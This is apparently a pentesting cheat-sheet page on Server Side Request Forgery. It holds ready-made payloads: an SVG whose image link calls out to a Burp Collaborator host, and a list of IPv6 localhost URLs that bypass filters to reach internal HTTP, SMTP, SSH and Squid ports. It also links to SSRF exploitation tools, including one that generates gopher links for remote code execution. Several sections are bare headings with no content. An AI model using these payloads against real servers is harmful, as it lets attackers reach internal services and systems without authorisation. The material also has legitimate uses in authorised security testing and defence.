search

Server Side Request Forgery (SSRF)

hashtag
Payloads

hashtag
SSRF in SVG file

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
    <image height="200" width="200" xlink:href="http://burpcollaborator.com/image.jpeg" />
</svg>

hashtag
Localhost Bypasses

hashtag
Using [::]

http://[::]:80/ #HTTP
http://[::]:25/ #SMTP 
http://[::]:22/ #SSH
http://[::]:3128/ #SQUID
http://0000::1:80/ #HTTP
http://0000::1:25/ #SMTP
http://0000::1:22/ #SSH
http://0000::1:3128/ #SQUID

hashtag
Using a domain redirection

hashtag
Using CIDR

hashtag
Using decimal IP location

hashtag
Using Octal IP

hashtag
Using IPv6/IPv4 Address Embedding

hashtag
Using malformed urls

hashtag
Using weird address

hashtag
Using enclosed alphanumerics

hashtag
Against a weak parser

hashtag
References

LogoGitHub - tarunkant/Gopherus: This tool generates gopher link for exploiting SSRF and gaining RCE in various serversGitHubchevron-right
Gopherus - Tool to generate gopher link for exploiting SSRF and gaining RCE in various servers
LogoGitHub - MindPatch/lorsrf: Fast CLI tool to find the parameters that can be used to find SSRF or Out-of-band resource load :crab:GitHubchevron-right
lorsrf - SSRF parameter bruteforce (use scant3r module instead)
LogoPayloadsAllTheThings/Server Side Request Forgery at master · swisskyrepo/PayloadsAllTheThingsGitHubchevron-right
SSRF Payloads Repository

PreviousOpen Redirect to XSSNextServer Side Template Injection (SSTI)

Last updated